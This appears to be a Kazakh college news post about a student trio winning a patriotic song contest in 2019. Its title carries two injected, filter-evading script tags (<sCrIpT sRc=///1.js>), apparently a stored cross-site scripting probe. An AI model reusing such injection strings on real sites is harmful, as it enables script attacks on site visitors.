«Гауһартас» триосы «Жас сарбаз» патриоттық әндер конкурсының I орын жүлдегерлері атанды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2019

    Ағымдағы жылдың қараша айында Щучинск қаласында орналасқан Қазақстан Республикасының Қорғаныс министрлігінің әскери-техникалық мектебінде әскери-патриоттық клубтар, жалпы білім беретін мектеп және колледж тәрбиеленушілері арасында жоғары патриоттық сезімді тәрбиелеуге негізделіп ұйымдастырылған «Жас сарбаз» патриоттық әндер конкурсы өтті.  Аталмыш байқауға Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің өнерпаз қыздары қатысып, ән орындаудағы шеберліктерімен көрермендерін тәнті етті. Сарапшылар тарапынан жоғары бағаланған «Гауһартас» триосы конкурстың жеңімпаздары атанып, I дәрежелі дипломмен марапатталды. Студенттеріміз Бабиева Алина, Жұмат Айша, Тлеужан Гүлбаршын «Жас сарбаз» патриоттық әндер конкурсында көрсеткен өнерлері үшін арнайы грамоталармен марапатталды.

 

 

 

 

Просмотров: 634


Пікір қосу



Деректерді қолтаңбаға қосу